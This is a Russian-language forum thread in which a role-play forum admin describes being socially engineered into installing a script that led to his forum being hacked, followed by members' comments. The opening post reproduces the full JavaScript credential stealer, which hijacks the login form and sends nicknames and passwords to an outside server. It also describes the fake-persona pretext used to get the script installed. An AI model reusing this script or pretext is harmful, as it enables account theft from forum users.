Данный проект создан для того, чтобы начинающие администраторы и Гейм-мастера могли найти здесь ответы на вопросы, часто возникающие при организации форумной ролевой литературной игры (верхние разделы форума). Остальные разделы предназначены для размещения рекламы ваших игр. РЕКЛАМА ВЗАИМНАЯ . Внимание! Правила рекламного каталога изменились: в каталог не принимается реклама форумов, пропагандирующих любые половые отклонения.
Отправлено: 26.11.07 22:39. Заголовок: Рассказ о взломе
[Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп.
24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт:
<script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script>
Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика)
Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров.
Разговоры на форуме "Критик" до взлома моего форума:
После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше.
"У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота.
Комментарий специалиста:
цитата:
Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"
Отправлено: 26.11.07 23:12. Заголовок: Надо отметить, что э..
Надо отметить, что этот взломщик, отлично справился с женской ролью. Это к слову о "Мужчинах, играющих женщин". Он очень долго разговаривал со мной в ЛС: ну такая девочка-припевочка! Blazing Wizard лопнул бы от зависти. Взломщик чуть ли не в любви мне в ЛС объяснялся. Жаль, что ЛС не сохранились - он, проникнув на форум, естественно, всё стёр. И аватар у него был такой сексапильный: такая розовенькая девочка с выпирающими из декольте грудями )))))
Отправлено: 27.11.07 12:01. Заголовок: Вот так и ловят люде..
Вот так и ловят людей на их слабостях и предрасположенностях! :) А все потому, что честь по чести ничего противопоставить не могут. Скучища, господа. Лис, выше нос - уроды остаются уродами и в Африке, а форуму от этого идиотизма ничего не сделается.
Отправлено: 27.11.07 13:03. Заголовок: Лис попался на том, ..
Лис попался на том, о чём сам писал в теме "Женщины, играющие мужчин": "Что хочет женщина - никому неизвестно, а мужчина как раз хочет её... то есть, женщину".
Теперь серьёзно: Лис хочет выложить всю историю взлома со всеми доказательствами, скриптами и скриншотами. Как Вы считаете? Это безумная идея? Рассвирепеют взломщики, рассвирепеет администрация Борды? Форум хакнут окончательно? (Нужное подчеркнуть). Скрытый текст
Отправлено: 27.11.07 13:16. Заголовок: А можно свой вариант..
А можно свой вариант? Может просто спокойно себе жить дальше? Взломщики должны любить внимание, а если их игнорить... может сами заскучают и испарятся?
Отправлено: 27.11.07 13:40. Заголовок: Взломщикам это тольк..
Взломщикам это только понравится. Администрация борды даже не обратит внимания, поскольку взлом был сделан не через уязвимости борды, а через уязвимости админа. Хакнут ли окончательно? Не знаю...
Отправлено: 27.11.07 16:54. Заголовок: Кстати, а профиль Со..
цитата:
Кстати, а профиль Соло тоже удалили?
Нет. Вернее удалил не взломщик, а я по её просьбе. Она пришла, увидела, что форум взломан и не захотела здесь больше оставаться. Попросила удалить свой профиль. Я знаю, что в некоторые моменты с ней лучше не спорить Solo такой человек... Человек неожиданных решений и ни на кого не ориентирующегося собственного мнения. Если она захочет уйти - её ничто не удержит. Пример: http://rollers.fastbb.ru/?1-5-0-00000008-000-0-0#005 (Там была как раз та самая "криминальная статья")
Norsefire Я вашу последнюю строчку убрал. Не надо такими словами разбрасываться - вдруг у них на критике что-то случится, а обвинят вас. (Если бы эти критики-кретины не стали в открытую обо всём говорить на своём форуме - фиг бы я догадался откуда ветер дует )
Сентябрьский Лис, спасибо за заботу, но это лишнее :))) Что же теперь, сидеть, бояться и не рисковать криво посмотреть в чью-то сторону, потому как хакнут-заспамят аську глупостями-постучаться головой о стенку и напишут заявление в милицию? Получается какой-то форпост в окружении Дивного Нового Мира. Баба Яга против :)))))))
Отправлено: 27.11.07 19:43. Заголовок: Мэгги, ну так если и..
Мэгги, ну так если им нечем гордится из сферы созидательного - значит, приходится гордится деяниями из серии "приумножим энтропию". Самоутверждаться ж как-то надо. Только, я думаю, совершенно не стоит идти на поводу у их самоутверждения. А то еще возомнят себе, что их боятся...
Отправлено: 27.11.07 20:26. Заголовок: После подписи этого ..
После подписи этого нашего красавца, думаю, стоит всякие темы на эту тему прекратить. А то действительно начнёт воображать, что добился своего. Дураку ведь только дай повод - он апстенку биться начнёт.
Отправлено: 27.11.07 22:22. Заголовок: Давайте лишний раз в..
Давайте лишний раз воздадим должное Case: значит, действительно его форумы так трудно взломать, что можно только обманом подлизаться к админу. А от обмана никто не застрахован. Обмануть можно и умного, и глупого. Но только дурак будет кичиться тем, что кого-то обманул.
Отправлено: 01.12.07 16:05. Заголовок: Блин! Критику никак ..
Блин! Критику никак не успокоиться! Они опять припёрлись. Ещё и порекомендовали свой баннер установить! А на баннере что написано: "Лучший форум по взлому лохов"?
Однако, хорошо, что у меня премодерация стоит! А Solo - как хочет, пускай так и пишет, если не хочет регистрироваться
Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале.
На счет взлома: то, что у Кота Бегемота начался маразм - не повод гнать всех критиков под одну гребенку. Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко. Хотя, порядок у них на форуме не мой... Я на Ролес провокаторов прищемил бы раньше.
Отправлено: 01.12.07 22:33. Заголовок: Zenitchik А кто их ..
Zenitchik А кто их просил этой ихней критики? Пусть оценивают того, кому это надо. По крайней мере, Ролес, на сколько я понял, не занимается оценкой чьих бы то ни было форумов, не спрося хозяев.
Все даты в формате GMT
3 час. Хитов сегодня: 39
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет